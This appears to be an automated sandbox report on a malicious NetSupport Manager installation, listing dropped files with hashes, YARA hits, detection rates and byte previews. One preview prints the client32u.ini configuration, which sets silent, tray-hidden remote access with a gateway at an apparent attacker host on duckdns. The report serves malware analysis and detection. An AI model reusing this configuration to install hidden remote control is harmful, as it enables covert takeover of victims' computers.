                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):551904
                                                                                                                    Entropy (8bit):5.925156666125814
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:YSQAix/cHSCXlYMPEvLrjORkDRZQxDChwuPJSKKu0T9ZNFvDvH:C23PE6RzDCnPJShu0/FvD
                                                                                                                    MD5:FE7D9DC26FF1615C13722E0F2DD3B815
                                                                                                                    SHA1:D36149AC1146404306224DFFD23AAFA748FBE5C0
                                                                                                                    SHA-256:09FDBC21AFDAAC95465BB2DD6F075C87443D7EC7F105DBDD61A515C25BC1C9FE
                                                                                                                    SHA-512:E371DC6D75A7A081E8C9F59CBB57133DD0D8B8A708F4FE0239D51CEF94B323468C3C6922BE0C3F896BA98289EB7C252CFEE1E42FA1211E2FFBDACC89DE2186DF
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~7...d...d...dQ..d...d...d...d..d...d..d...d...d)..d...df..d...d...d...d...d...d...d..d...d...d...dRich...d........PE..L.....oe.....................t.......w............@.......................................@..........................................@...................]...P...5...................................I..@...........(...8............................text............................... ..`.rdata..............................@..@.data....k.......&...~..............@....idata... ......."..................@....rsrc........@......................@..@.reloc..B=...P...>..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):95872
                                                                                                                    Entropy (8bit):6.522984250421539
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:FjJGou6vXbHlVK4KGLyfTdvIZTkTavAiZQZ+oWDzFobYIWi5v2RviI:5Ja6vfK/GLYTq5kTatZEcJobwi5vGvr
                                                                                                                    MD5:38935DB0DD061269B7D79A1D287E750C
                                                                                                                    SHA1:B52E80F2421CEDF293EB8723FE32D8A91986228B
                                                                                                                    SHA-256:5A7E162064982B196F646DC3F4C4A5CC50858DA13BCFBA268F8BA0A6D9ABB741
                                                                                                                    SHA-512:2E8136C935D1CAD05CA1B9469238BFC3BCB3020A6F6E73949E8DA97F33133C8143119030210E58317DD484F7323FC197B6559B77055A76BCCA09232002A8E35A
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.l..h?..h?..h?..i?..h?...?..h?...?..h?...?..h?...?..h?...?..h?...?..h?...?..h?...?..h?...?..h?Rich..h?........PE..d...m.hY.........." .....(...N......4...........................................................................................................(...............,....X.......... ....@...............................................@...............................text..."#.......$.................. ..h.rdata.......@.......(..............@..H.data....*...P.......8..............@....pdata..,............B..............@..H.edata...............J..............@..@INIT.................N.............. ....rsrc................R..............@..B.reloc...............V..............@..B................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):120288
                                                                                                                    Entropy (8bit):5.258524582048951
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:wfVZl6FhWr80/SqUr2pe/3NjHDHf/ckwGr2pe/k5XHDHf/ckVjp:w70hGaq0ee/3BjHdee/yXjHhjp
                                                                                                                    MD5:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                    SHA1:32664B5F0B27E26E75DBD97F1ED11397E4D1C9A6
                                                                                                                    SHA-256:72D9BD23541500A0F0FB657DA320A039894939500BE7D217C6627D05FCC5E629
                                                                                                                    SHA-512:C29951BED7CD6A6431BF15848DAFE3A438A05E1021EAC4B5A73585A6B39E7ECFB94567566D1641284533B80DBA3EF45070E933B98E472BF206E65CC5A6CE5B06
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.g.W.g.W.g.^...U.g.8...T.g.W.f.R.g.8..V.g.8...V.g.8...V.g.RichW.g.........PE..L...1.oe.....................r...... ........ ....@.......................................@.................................< ..<....0..Hm...........x...].......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc...Hm...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):836
                                                                                                                    Entropy (8bit):5.502925006660024
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:nBhzEPmPT8FVXR8piBlnxOo31fXXfD+2ijr6cgEW3ZxAhU6L:nBtuK+VXypGlnxJ31fHfqj+cg3ZG
                                                                                                                    MD5:165A65E2FDE1870C85C463D021600B62
                                                                                                                    SHA1:16D38EAE2E83F532AF04117CEFF0D1DA80695076
                                                                                                                    SHA-256:8EF0F3A5FE3C2338E27BEFAAB18823135E22DA3462651FDA832D4C513F082BC6
                                                                                                                    SHA-512:8B7507AD5E91377FC50673C649B8FA26245504AF53200AFBE56130B67C05318E707CC642FF0A54771DEFD5AC87252684AB5245099C7CE2AA81F0C52B55A48D7D
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xf10b75ab....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..UsernamesU=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..PasswordU=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gskmode=0..GSKU=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250160
                                                                                                                    Entropy (8bit):6.6978319974134735
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:7tOrNG33aoeoMgFrxCCTZkogkArqfmUQr3fGkfJFCIZJ12z/bRbH:7tOrO3Ksko5Arq23AIZKzx
                                                                                                                    MD5:E5F65F0775313A0C23B3C61916C2C3EF
                                                                                                                    SHA1:CF84F9C9DF08D389C07C3E51EFDF7714D188BDFE
                                                                                                                    SHA-256:AF557540224984F759068120590A8178AB50406BCAE8812351B56B274BC6D4F5
                                                                                                                    SHA-512:15F9B9AEB40622EE9D6AD19CA17B1F1A1666BF8F33DC9A604E22F7550F4CA9BC7B0DD2AA6AF24E6EF534CCAC007E923C6CFF2507F7357489F5ADCA369D782B06
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~e.............b........g.......y..........P....y.......y.......y.......y.......y.......y.......y......Rich....................PE..L......Z.........."!.........x...............0....................................... ....@A.............................K..(b..........................0?......./...;..8............................;..@............`..$............................text...<........................... ..`.data........0...,..................@....idata.......`.......J..............@..@.rsrc................\..............@..@.reloc.../.......0...b..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\gdihook5.INF

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Windows setup INFormation
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2381
                                                                                                                    Entropy (8bit):5.374632099663492
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:E4hfow3Kqy0nxNrwN1XQmeFh+5XXdJpBsK38pwlFTP/Fs0cv:EBwG0xNrwN+qD3MpwlFL2tv
                                                                                                                    MD5:703C7774B981E5D02E058340A27A5B75
                                                                                                                    SHA1:37534D7F0B31D2328D70CA578047D597273B73B6
                                                                                                                    SHA-256:4CFCA868959F4E1B85BFD6B8A970AE06C0810D9C341F260DF3AB8479089500E9
                                                                                                                    SHA-512:758E84915FA7EBB343BAFD096BC40D9D226FE0DA7C167B2B8E59F664E1BE796143228BC3405DF7E3447CDC918004DB516344365D3D07A8E6C040DF2B90456D78
                                                                                                                    Malicious:false
                                                                                                                    Preview:; gdihook5.inf..; Installation inf for the gdihook5 mirror driver...; copyright (c) 2011 NetSupport Ltd....[Version]..Signature="$WINDOWS NT$"..Provider=%PCI%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=08/14/2011,11.11.0.704..CatalogFile=gdihook5.cat....[DestinationDirs]..DefaultDestDir = 11..gdihook5.Miniport = 12 ; drivers..gdihook5.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%PCI% = gdihook5.Mfg, NTx86, NTamd64....[gdihook5.Mfg.NTx86]..%gdihook5.DeviceDesc0% = gdihook5, pci_gdihook5_hwid....[gdihook5.Mfg.NTamd64]..%gdihook5.DeviceDesc0% = gdihook5, pci_gdihook5_hwid....;..; General installation section..;....[gdihook5]..FeatureScore=FC..CopyFiles=gdihook5.Miniport, gdihook5.Display....;..; File sections..;....[gdihook5.Miniport]..gdihook5.sys....[gdihook5.Display]..gdihook5.dll......;..; Service Installation..;....[gdihook5.Services]..AddService = gdihook5, 0x00000002, gdihook5_Service_Inst....[gdihook5_Service_Inst]

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\gdihook5.cat

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8991
                                                                                                                    Entropy (8bit):6.951682034433646
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:iEd0VE3v3k08ywwlhjeyveCtAW5LfsxhQ8eVC:iDwPjpvjAGLa3x
                                                                                                                    MD5:2D31CE5FE7CD81C996615EBCC29C058A
                                                                                                                    SHA1:4D74FE8E3170D36666DF779E43FE8016986B154A
                                                                                                                    SHA-256:019290C9B7E5B48FB6DE95F9563ED481CD42F8658451C6FBC8AD131D61209CE0
                                                                                                                    SHA-512:B8188481050630E7317D2F0687790A46E86F30A79F34164E4B02EC28DA39334DA80BD494A4F32AE8BB60FA2F01273CDCD9D15100F901517B0C01507678330052
                                                                                                                    Malicious:false
                                                                                                                    Preview:0.#...*.H........#.0.#....1.0...+......0.....+.....7......0...0...+.....7......8.k.&.L.(|{%.....110823130027Z0...+.....7.....0...0....R3.7.5.3.4.D.7.F.0.B.3.1.D.2.3.2.8.D.7.0.C.A.5.7.8.0.4.7.D.5.9.7.2.7.3.B.7.3.B.6...1.._0<..+.....7...1.0,...F.i.l.e........g.d.i.h.o.o.k.5...i.n.f...0X..+.....7...1J0H...O.S.A.t.t.r.......22.:.5...0.0.,.2.:.5...1.,.2.:.5...2.,.2.:.6...1...0a..+.....7...1S0Q0,..+.....7........<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+........7SM..1.2.p.W.G.';s.0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R4.3.B.5.4.2.0.5.8.2.1.8.D.7.F.0.D.5.2.3.9.3.F.3.2.9.4.E.7.7.9.0.F.A.8.E.8.C.1.3...1..g0<..+.....7...1.0,...F.i.l.e........g.d.i.h.o.o.k.5...s.y.s...0X..+.....7...1J0H...O.S.A.t.t.r.......22.:.5...0.0.,.2.:.5...1.,.2.:.5...2.,.2.:.6...1...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+.....

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):59872
                                                                                                                    Entropy (8bit):6.890148857867
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:YKLLK1jLIrJUw9Dyehz6mnTEDtGCd3FN+r2pe/q3HDHf/ckBr2pe/NyHDHf/ckt:YKLLKS9Dvhu5NOee/ajHxee/UjHR
                                                                                                                    MD5:7AC62F00194B01935EA6A35CF8884912
                                                                                                                    SHA1:7A04936B6C234AA924AD3293188A39B3CC49AD3A
                                                                                                                    SHA-256:5B87FAFB20833B4803F829C6816235048566579F6C72EF44B6FDE1F54195384F
                                                                                                                    SHA-512:86A98BF85142DFF3F6643B964579D2AC2438BE9A3D644E2C0E1BD3FF055C0CE17ACFC689503AB0A9AFB4E495B406592597F613F47C12E8E2413F6AA89E0B5FD7
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:-.~L..~L..~L...:".vL...:..FL..w4/.}L..~L..6L...:..uL...:'..L...:&..L...:!..L..Rich~L..........................PE..L.....oe...........!.....J...>...............`.......................................e....@.............................]....z..(.......(................]...........................................x..@............`...............................text....I.......J.................. ..`.rdata..m!...`..."...N..............@..@.data................p..............@....rsrc...(............|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2578344
                                                                                                                    Entropy (8bit):6.251948534749446
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:4X0hD1wHH5cvdcSvrIq8hJ1CPwDv3uFh+OfXXU:4X0hD1w21csIq831CPwDv3uFh+j
                                                                                                                    MD5:8A04281ABC13FE1D4C8587AE9D177C42
                                                                                                                    SHA1:72C2FCB96404C32C8BD8D1B2752B0B24CE9AB539
                                                                                                                    SHA-256:DD697C680C7296FE84F8761C54D7DAEED41222E86D409A4751F5A53B16A82B0B
                                                                                                                    SHA-512:DD13813A32C1561115C1B61B50F56B560A1C2BF27F061A9E7B328937DC896150B4C31AC57BFEA475DA8ED08996F708C8724B9D50FC2DC2D59EAF25CACE32D112
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..pw.@#w.@#w.@#~..#c.@#d.A"u.@#d.C"}.@#d.E"}.@#d.D"}.@#..A"z.@#w.A#.@#w.@#`.@#I.D"..@#I.@"v.@#I.#v.@#I.B"v.@#Richw.@#........PE..L...0*._...........!................E........................................p'.......'...@.........................`g#.hg...6&.h....`&.|.............&..]...p&..... K#.8...........................XK#.@............0&..............................text............................... ..`.rdata..............................@..@.data...8\....%.......%.............@....idata..R....0&.......%.............@..@.00cfg.......P&.......%.............@..@.rsrc...|....`&.......%.............@..@.reloc..q....p&.......&.............@..B........................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):555944
                                                                                                                    Entropy (8bit):5.860497620903766
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aVM2qk4ikDJj2hZuF/fpGzBqGPeck8p22gU2lvzaP1r4:X2q7ikLXg+c7wU2lvzaPi
                                                                                                                    MD5:D559D1B694B817E3E3E15200AF4603F6
                                                                                                                    SHA1:4D486E5D8171973C17E61ACA47FC97A71BC9EB7E
                                                                                                                    SHA-256:407C28909CEA2ADC3B2B2A1F89132A543F57EFF9D96CDAA5DEEF5109CB2CA770
                                                                                                                    SHA-512:6480B2F66558BDB5D0243E66AECD4E9B347BC5A67B829AE1980043AC487290B8CF04C43F3294E4160B5CA4F604D1C17000458EEBF759A530C5B79E2A952A72BB
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l.S.l.S.l.S..ZS.l.S...R.l.S...R.l.S...R.l.S...R.l.S...R.l.S...R.l.S.l.S<m.S...R.l.S...R.l.S..6S.l.S...R.l.SRich.l.S................PE..L...1*._...........!.........................................................p............@......................... )...N........... ..s................]...0...5......8...............................@............................................text............................... ..`.rdata..*g.......h..................@..@.data....;.......6...^..............@....idata..3A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..;=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\logo.png

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PNG image data, 300 x 77, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6843
                                                                                                                    Entropy (8bit):7.939767423234445
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:YSH/KoQ1X5F8VX3JNHimWaMp3Lu0FEkxpGAlNjGJHpLgwDy+eFyb:fyl/aVXK7u09JNoJ0wDy+C+
                                                                                                                    MD5:9A9827C570F102CA3366E549A047B99A
                                                                                                                    SHA1:682C7A3612B300B1F3D0B5E0BE557ED148003DE0
                                                                                                                    SHA-256:F1F79307A3352EFB6CE296EED242F368C4724144B7B2F624C1B4223C7952A2C9
                                                                                                                    SHA-512:8BBFA11F841276A07E29E8D042FD4436C569BA984A56F6EB45D9D73A65BE7EBFECF8D8BC81D122FCF9DE4814A41EF38E7150EFAA8D06C0BE0145B74712D5E834
                                                                                                                    Malicious:false
                                                                                                                    Preview:.PNG........IHDR...,...M.......Y>....pHYs................mIDATx..y.....3,..*..PA#....zB..hPc.Dc\.1...3ZV.K.hb.b..[.w.[.ZZ."..D..E.e.m...qn;55.=..3.=s....tU.u.....{NYuu5...R.....,....X.e.XJ.+.,.K.`...b)....X,%..X...d...b...V`Y,....,..R2X.e.XJ.+.,.K..>.....%.a.4.'...e...w..x6.mu.pY..g..R^.....R^..cb.2...M..#....s.......8At3p..1.=`..O..m.q..R^/.Wb.....>.u.7.^V.~.b..K......Q.>(..".|....&w....:....W..\.u.D.\.6.....;M.ocy...y?..............P.hz...?.....N.m.....[.<..Qo.......`........w.7..q..'...s..Y..o.C.ZX..Y.u t...b.&e..f...8.....R.D....Jy."l....NA....E.W..E....}w5P.<...N............^....q....v....1e.#s.hX.....C..~.u...UB(...<.l..c...3...u.........c..kvp...p0..D..[........;...._.~..7q"_~.e3..8...\.....w.....5...Zj..j...y..&)...xCk{....D;.?...c.[...eN.]...<.t..O@o`..D..f..}.....;.h.".x.......F...|.. (D`...^W...u.ns.(.R^9...#b..oj....L.:..hP...y...H..\)..........#....#.._.gl.B)..`s..T..".:...e.].pu..=...v@w.O.V#.....B.h.{....._:.s...g.\.

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4397384
                                                                                                                    Entropy (8bit):7.044443988235452
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:WEWsrhmswShHpSvnB5MnhpTnWbWA7ySeAfCt0PfI9jWwg76YAvvU+uFLOAkGkzdz:W6DWbLRojDbvU+uFLOyomFHKnPA25
                                                                                                                    MD5:493FC0F59054A6F4F3775655FB55295C
                                                                                                                    SHA1:2AFE4F5EB626FB5C5AA5BB6C2BC61C88E37CF42F
                                                                                                                    SHA-256:CAC58C98F7E587BA1B2A4F41874764B59BDF6CB684A4A44AEE93F91B3B9A019B
                                                                                                                    SHA-512:9DA41078A65A6B8C731388CCF4CE2A988705305F29F0841039B96CD2649F82E8EA219F082DE184826E39F0EDAA4A1D9AFF2E60EBB8D27771222D0C7CB165598D
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._.1...1...1.......1.......1.......1.'....1.......1.......1.......1.......1...0.H.1.....(.1.......1.......1.......1.Rich..1.................PE..L......M.........."!......*..d......%.%.......+....x..........................C......|C...@...........................*.....<.).......,.H.............C.H.....@....../..................................@...............8.....)......................text.....*.......*................. ..`.data.........+.......*.............@....rsrc...H.....,.......+.............@..@.reloc...a....@..b....?.............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4422992
                                                                                                                    Entropy (8bit):7.012472770624414
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:jsWbb5oF0MUVVsK3vOGH+1TSlUE7vrffTTnm7ulf67NACOub7FLOAkGkzdnEVomK:jx5x3Ii6F7FLOyomFHKnPA+
                                                                                                                    MD5:F32077DF74EFD435A1DCDF415E189DF1
                                                                                                                    SHA1:2771393D56FF167275BF03170377C43C28EE14E1
                                                                                                                    SHA-256:24BB6838DEFD491DF5460A88BED2D70B903A2156C49FB63E214E2C77251ECA71
                                                                                                                    SHA-512:FB708E0949854998FB80635138C80AC05D77DCA3089D3E5974663DDF2376D6A03535DAE1A068514C3B58BC06C8E4078B37CFB6BC90F080F7F31FEFC972A34850
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._.r1..r1..r1......r1......r1....r1.'<...r1....r1....r1....r1......r1..r0.^q1...(s1....r1....r1....r1.Rich.r1.................PE..L....)_M.........."!.....P+..h......I:&......`+..._x..........................C.......C...@.........................P}*.P...HE*......p,.H............fC.P.....@.....`/..............................@N..@...................<)*......................text....N+......P+................. ..`.data........`+......T+.............@....rsrc...H....p,.......,.............@..@.reloc..Fc....@..d....@.............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):5178656
                                                                                                                    Entropy (8bit):6.880627623004376
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:DEl4oAxkdYqhHRMg7R/dRwIc/3jYkCw055xXtQo7h6jBPgUYcupFLOAkGkzdnEVM:DlEdLhxM+/TwIc/j65x9aZgUYcaFLOyM
                                                                                                                    MD5:835F7A6C55D49EAE72A482D781B1EAD8
                                                                                                                    SHA1:CC63546F46E0BDA33EFFF2CDA121219667EB70E3
                                                                                                                    SHA-256:A52B83AC23739BCC8B0E89D1EFC05A199FE7CF8914D3F42C8DB5560CADB105E7
                                                                                                                    SHA-512:F0F0B36502AB2E3283ACD87171E0F7FE823515A4DCE7C70079AB26D3F75096E9A05EA6E0377E50ACF21B491AFE404DABFFBD0D91D6421C0B337CB3C6CE72CB24
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......T..........mJ....mL....mM.....*............................mV.....................F.........Rich..........................PE..L......Z.........."!......4.........P`.......@0...............................O.......O...@A............................L...|=5.......5...............N. ?...@K......<4.8...........................Xf..@............05.x.....4......................text....-4.......4................. ..`.data...x....@4......24.............@....idata...S...05..T....5.............@..@.didat........5......b5.............@....rsrc.........5......f5.............@..@.reloc.......@K.......J.............@..B................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):421200
                                                                                                                    Entropy (8bit):6.595942471932211
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:Seb8zxr1aWPaHX7dGP5frhUgiW6QR7t5qv3Ooc8UHkC2e7wx:Seb8Fpa6aHX7dGP5Gv3Ooc8UHkC2ekx
                                                                                                                    MD5:BC83108B18756547013ED443B8CDB31B
                                                                                                                    SHA1:79BCAAD3714433E01C7F153B05B781F8D7CB318D
                                                                                                                    SHA-256:B2AD109C15EAA92079582787B7772BA0A2F034F7D075907FF87028DF0EAEA671
                                                                                                                    SHA-512:6E72B2D40E47567B3E506BE474DAFA7CACD0B53CD2C2D160C3B5384F2F461FC91BB5FDB614A351F628D4E516B3BBDABC2CC6D4CB4710970146D2938A687DD011
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..d...d...d.......d.......d...d..Cd..K*...d.......d.......d.......d.......d.......d.......d.......d..Rich.d..........................PE..L...A..M.........."!.................<.............x................................(~....@.................................<...<.... ...............V..P....0..D;..p................................/..@...............p............................text...u........................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):462120
                                                                                                                    Entropy (8bit):6.664460200008014
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:U3QUergtVD7jfIobCFvUk5ShUgiW6QR7t5s03Ooc8dHkC2esIj:9UXzD3IoCFvUG03Ooc8dHkC2eJj
                                                                                                                    MD5:11BC8B95833B52E09DAC5EC36F09C125
                                                                                                                    SHA1:8ED0EA8ACB742F084816261E7CD5AAB5B98E22BE
                                                                                                                    SHA-256:32882ABB46333874F3DD9B3648CEA6DE18D75D04863C2CD2F1BCDDBF348E3A26
